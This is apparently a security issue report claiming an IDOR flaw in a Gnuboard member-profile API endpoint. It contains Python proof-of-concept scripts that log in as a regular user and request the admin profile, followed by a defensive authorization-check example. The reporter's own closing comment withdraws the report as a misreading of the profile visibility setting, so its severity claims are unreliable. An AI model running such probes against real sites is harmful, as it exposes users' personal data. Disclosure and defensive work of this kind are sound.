## Summary
An **IDOR (Insecure Direct Object Reference)** vulnerability exists in the endpoint `/api/v1/members/{mb_id}` which allows **any authenticated user** to retrieve **arbitrary user profile information**, including administrator accounts, by simply modifying the `mb_id` path parameter.
This constitutes a serious **vertical privilege escalation (CWE-269, CWE-284)** and **sensitive information disclosure (CWE-200)**.
## Step-by-Step Reproduction (PoC)
### 1. Register and log in as a regular user to obtain a JWT access token
```python
import requests

# Request a token for a regular (non-admin) account from the token endpoint
url = "http://localhost:8000/api/v1/token"
credentials = {
    "username": "test",  # username
    "password": "1234"
}
res = requests.post(url, data=credentials)  # credentials are sent form-encoded
if res.status_code == 200:
    token_data = res.json()
    access_token = token_data.get("access_token")
    refresh_token = token_data.get("refresh_token")
    print("[+] Access Token:", access_token)
    print("[+] Refresh Token:", refresh_token)
else:
    print(f"[!] 로그인 실패: {res.status_code}")
    print(res.text)
```
### 2. Use that regular user's token to access the admin profile
```python
import requests

access_token = "<access token from step 1>"
target_mb_id = "admin"  # the mb_id path parameter the report varies
url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
    "Authorization": f"Bearer {access_token}"  # regular user's token
}
res = requests.get(url, headers=headers)
print(f"[+] Status: {res.status_code}")
print(res.text)
```
### Vulnerable Response:
```json
{
  "mb_id": "admin",
  "mb_nick": "최고관리자",
  "mb_email": "admin@your-domain.com",
  "mb_point": 100,
  "mb_profile": "",
  "mb_icon_path": "/static/img/no_profile.gif",
  "mb_image_path": "/static/img/no_profile.gif",
  "mb_1": "",
  "mb_2": "",
  "mb_3": "",
  "mb_4": "",
  "mb_5": "",
  "mb_6": "",
  "mb_7": "",
  "mb_8": "",
  "mb_9": "",
  "mb_10": ""
}
```
## Impact
* Any authenticated user can access **any other user's profile**, including admin.
* Disclosed data includes **email, nickname, points**, and potentially more.
* Reflects **improper access control** and **vertical privilege escalation**.
## CWE References
* **CWE-269**: Improper Privilege Management
* **CWE-284**: Improper Access Control
* **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
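As an added example (not Gnuboard's code), the object-level authorization check that a handler for `/api/v1/members/{mb_id}` needs: the owner or an administrator receives the full record, other members receive only a public projection and only when the target's `mb_open` flag is set (the profile visibility setting named in the comment below), and every other request is denied. The admin level, the public field list and the member records are assumptions constructed for this example.

```python
from dataclasses import dataclass, asdict
from typing import Optional

# Constructed member records modelled on the fields in the report.
# mb_id, mb_nick, mb_email, mb_point and mb_open are names from the page;
# mb_level and all values are assumptions made for this example.
@dataclass(frozen=True)
class Member:
    mb_id: str
    mb_nick: str
    mb_email: str
    mb_point: int
    mb_level: int   # assumed: ADMIN_LEVEL and above marks an administrator
    mb_open: bool   # profile visibility flag named in the thread

ADMIN_LEVEL = 10  # assumption, not a Gnuboard constant
# Fields shown to other members when a profile is open (assumed policy);
# e-mail is deliberately excluded from this projection.
PUBLIC_FIELDS = ("mb_id", "mb_nick", "mb_point")

MEMBERS = {
    "admin": Member("admin", "최고관리자", "admin@your-domain.com", 100, ADMIN_LEVEL, False),
    "test": Member("test", "tester", "test@example.invalid", 5, 2, True),
    "bob": Member("bob", "bob", "bob@example.invalid", 0, 2, False),
}

def get_member_profile(requester_id: str, target_id: str) -> Optional[dict]:
    """Authorize a profile lookup on behalf of an authenticated requester.

    Returns the full record for the owner or an administrator, a public
    projection when the target has opened their profile, and None in every
    other case (the HTTP layer should then answer 403, or 404 if it must
    avoid confirming that the mb_id exists).
    """
    requester = MEMBERS.get(requester_id)
    target = MEMBERS.get(target_id)
    if requester is None or target is None:
        return None
    if requester.mb_id == target.mb_id or requester.mb_level >= ADMIN_LEVEL:
        return asdict(target)
    if target.mb_open:
        return {field: getattr(target, field) for field in PUBLIC_FIELDS}
    return None
```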
1 comment
oxqnd
4 months ago
I reported this issue without checking the mb_open (profile visibility) setting for the account.
I apologize for the confusion, and I will close this issue.